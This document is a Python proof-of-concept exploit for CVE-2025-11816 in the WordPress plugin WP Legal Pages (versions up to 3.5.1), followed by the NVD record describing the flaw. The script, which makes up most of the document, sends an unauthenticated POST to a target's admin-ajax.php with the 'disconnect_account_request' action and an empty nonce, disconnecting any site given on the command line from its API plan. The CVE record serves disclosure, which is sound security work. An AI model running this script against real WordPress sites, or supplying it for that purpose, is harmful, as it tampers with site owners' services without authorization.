CVE-2025-11816

# CVE-2025-11816 PoC - WP Legal Pages Unauthorized Account Disconnect # Target: WordPress site with WP Legal Pages plugin <= 3.5.1 import requests import sys def exploit_wplegalpages(target_url): """ Exploit for CVE-2025-11816: Missing authorization check in disconnect_account_request() Allows unauthenticated attackers to disconnect site from API plan. """ # Target WordPress site target = target_url.rstrip('/') # Vulnerable endpoint - admin-ajax.php exploit_url = f"{target}/wp-admin/admin-ajax.php" # Payload: Trigger disconnect_account_request action data = { 'action': 'disconnect_account_request', 'disconnect_nonce': '' # Nonce not properly validated } print(f"[*] Targeting: {target}") print(f"[*] Exploiting CVE-2025-11816...") print(f"[*] Sending request to: {exploit_url}") try: # Send POST request without authentication response = requests.post(exploit_url, data=data, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response Body: {response.text[:500]}") if response.status_code == 200: if 'success' in response.text.lower() or 'disconnected' in response.text.lower(): print("[+] SUCCESS: Site disconnected from API plan!") return True else: print("[*] Request sent, verify manually if disconnection occurred") return True else: print("[-] Request failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-11816-poc.py <target_url>") print("Example: python cve-2025-11816-poc.py http://example.com") sys.exit(1) target_url = sys.argv[1] exploit_wplegalpages(target_url)

{"cve": {"id": "CVE-2025-11816", "sourceIdentifier": "[email protected]", "published": "2025-11-01T02:15:32.843", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Privacy Policy Generator, Terms & Conditions Generator WordPress Plugin : WP Legal Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disconnect_account_request() function in all versions up to, and including, 3.5.1. This makes it possible for unauthenticated attackers to disconnect the site from its API plan."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wplegalpages/tags/3.5.1/admin/class-wp-legal-pages-admin.php#L114", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wplegalpages/tags/3.5.1/admin/class-wp-legal-pages-admin.php#L138", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3385159/wplegalpages/trunk?contextall=1&old=3375554&old_path=%2Fwplegalpages%2Ftrunk", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2116340a-160f-493c-abe3-75b05282d78a?source=cve", "source": "[email protected]"}]}}